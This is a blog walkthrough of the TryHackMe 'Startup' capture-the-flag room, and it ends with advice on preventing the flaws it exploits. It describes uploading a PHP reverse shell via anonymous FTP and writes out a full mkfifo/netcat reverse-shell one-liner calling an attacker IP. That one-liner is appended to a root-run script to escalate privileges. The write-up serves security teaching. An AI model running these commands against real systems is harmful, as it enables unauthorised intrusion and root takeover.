March 9, 2021

THM Startup room

Today, I am going to attempt Try Hack Me's Startup room. In this beginner room I am going to see what is going on since they tell us that the developer may not know what they are doing.

The first thing I do every time is click the "Start Machine" button to get the machine online and then get an IP address that you can look at. After starting the room the next thing I will do is to visit the site to see what the main page looks like. The main page looks to be a placeholder that really has no information on it.  While I was looking at the page I always like to have nmap and gobuster running to see if there is any other information that maybe interesting. The nmap command is nmap -sV -sC -oA nmap/server IP ADDRESS. I could include the -p- to see if there are any other random ports that are outside of the most common ones but in this room I am going to skip it until I need to do that.

I can see that ports 21, 22 and 80 are open. Port 80 is the website and that isn't interesting, port 22 will require credentials and I am going to skip that one and finally port 21 is FTP. The interesting thing about this FTP server is that it allows anonymous logins. Let's try to see what is there and what could possible be the next step.I like to have gobuster running at the same time to see if there is some hidden files or folders. The command that is needed for this is gobuster -u http://IP ADDRESS -w /usr/share/dirbuster/directory-2.3-small.txt -x php,html,js,sh. That scan returned only 1 file and directory and the directory is called /files.

To try and FTP to the server you can issue the following command on your Linux terminal. ftp IP ADDRESS it will ask you for a username and that is of course anonymous. The password is blank due to the anonymous login. When I got onto the ftp server I issue a dir command to list the contents of the page.

There are some files that are on the server that I want to take a look at. I will do get notice.txt and get important.jpg to retrieve the files onto my computer. The next thing that is interesting is the ftp directory that has the 777 permissions applied to it. Lets cd to that directory and take a look. Since the directory has global allow permissions I will upload a shell.php, which is a php shell that I got from Pentest monkey. In the script make sure that you change the IP address and the port that you want the server to communicate on.

Once the file is uploaded, I went to the /files directory that I found using gobuster earlier. I saw that my shell.php file is located there and before I click on the link I want to make sure that my attack machine has netcat running with the port that I specified in the script.

Now that I have a shell on the machine I want to stabilize the shell and get tab completion setup. To do that I want to use the following commands, python -c 'import pty;pty.spawn("/bin/bash")' and export TERM=xterm and you will have the following screen setup.

The first thing I did is list the contents of this directory to see if there is anything that is interesting.

The first thing that I noticed is the incidents folder that is owned by the www-data user, which is who I am currently. Let's take a look at that directory.

Well, that is really interesting. There is a wireshark capture that I would like to get onto my machine and take a look at. So the easiest way to get that file down is to use scp to copy the file down to my machine. I could also start a python http server on the box and download files via that web server.

I opened the file and looked at it and I noticed that towards the middle there is a bunch of tcp connections. So, right click on one of the lines and follow the tcp connection and that will open up another window with all the information that was transmitted during that connection. I found a password in the file and it wasn't correct for the user that they were trying to escalate to. I think that maybe the other user on the box, hint: look in the /home/ directory to see the other username.

Now that I have a password for later let's take a look at the original folder. There is another interesting text file that is in that directory called recipe.txt. That folder contains a sentence which contains an answer for the recipe question.

So, now that I have one question answered let's see if I can get the user.txt flag. I try to su lennie and enter the password that I found in the wireshark capture and it was successful. Now I navigate to the home folder of Lennie, /home/lennie and see that there is a user.txt file. Cat that file to get the flag for the next question.

I see that there is a scripts folder and I would like to look into that directory to see if there is anything that is interesting.

Now that I have taken a look at the files I notice that the planner.sh shell script runs the etc/print.sh as a root user. The /etc/print.sh file allows us to write whatever we want to the file and I am going to see if I can inject another script to get another reverse shell. To do that I will use the following command. rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.2.4.70 8889 >/tmp/f and then the command to modify the file echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.2.4.70 8889 >/tmp/f" >> /etc/print.sh Make sure that you use the double greater than signs so that you append the line to the end of the file.

Once you have modified the file make sure that you have another netcat terminal running with the correct port that you specified above. My port is 8889, so the nc -lvnp 8889 will allow me to wait to catch the reverse shell.

After a few moments I noticed that I have the magical # with a cursor after it and I know that I am now root. So, it is time to go to the /root folder and cat the contents of that file for the root flag.

Recommendations on how prevent this.

Something new that I am going to try is to provide suggestions on how to avoid this type of problem in the real world. First of all, I would not allow anonymous FTP to the server. If you have to allow FTP make sure that there are users setup that can use and better yet try to get SFTP setup. For those that don't know SFTP operates over port 22 so it uses SSH to encrypt transmissions between the client and the server.

You could also be careful to not store information that anyone can read, i.e. not allow the 777 permissions to information that maybe harmful. This would have prevented the script from being changed so that the user that is trying to privilege escalate would have a harder time doing it. The same would apply to the wireshark capture, since that gave away a password that was used to get an intermediate user on the system.

As always if you have questions or feedback please submit it to: feedback@markschindel.com.